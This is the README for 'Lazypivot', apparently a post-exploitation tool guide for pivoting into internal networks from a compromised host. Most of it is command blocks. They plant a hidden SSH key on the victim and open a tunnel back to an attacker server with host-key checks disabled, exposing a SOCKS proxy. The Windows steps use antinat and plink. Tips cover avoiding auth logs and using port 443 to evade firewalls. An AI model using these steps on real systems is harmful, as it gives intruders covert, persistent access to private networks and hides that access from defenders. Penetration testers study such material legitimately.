62 lines
1.8 KiB
Markdown
62 lines
1.8 KiB
Markdown
# Lazypivot
|
|
Making pivoting into internal networks easier and faster so you can focus on the real fun :)
|
|
|
|
## Principles
|
|
The idea is to executa a socks5 server on the compromised target and forward the local exposed port remotely via SSH.
|
|
A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat](http://www.malsmith.net/antinat/) coming to the rescue.
|
|
|
|
## Linux
|
|
### Simpler
|
|
On our server
|
|
```
|
|
useradd -m -s /bin/nologin targetname
|
|
ssh-keygen -t ecdsa -f /tmp/sshkey -q -N ""
|
|
mkdir /home/targetname/.ssh
|
|
cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
|
|
chown -R targetname:targetname /home/targetname/.ssh
|
|
chmod 600 /home/targetname/.ssh/authorized_keys
|
|
cat /tmp/sshkey
|
|
```
|
|
|
|
Copy the content of /tmp/sshkey
|
|
|
|
On the compromised host
|
|
|
|
```
|
|
echo "my copied sshkey" >> /tmp/.keyfile
|
|
chmod 600 /tmp/.keyfile
|
|
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver
|
|
```
|
|
|
|
Now on your server
|
|
|
|
```
|
|
ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT
|
|
```
|
|
|
|
### Stealthier
|
|
We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.
|
|
|
|
Instead of using with the socks options, upload the provided package and directly forward the `antinat` port.
|
|
## Windows
|
|
|
|
Upload the package and extract it with 7z.exe.
|
|
|
|
Start the antinat binary, no admin permissions are required:
|
|
|
|
```
|
|
antinat.exe -a -cantinat.xml
|
|
```
|
|
|
|
Forward the antinat port with plink:
|
|
|
|
```
|
|
plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver
|
|
```
|
|
|
|
|
|
## Tips
|
|
|
|
* Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules
|
|
* [User corkscrew for SSH via HTTP Proxy](https://github.com/bryanpkc/corkscrew)
|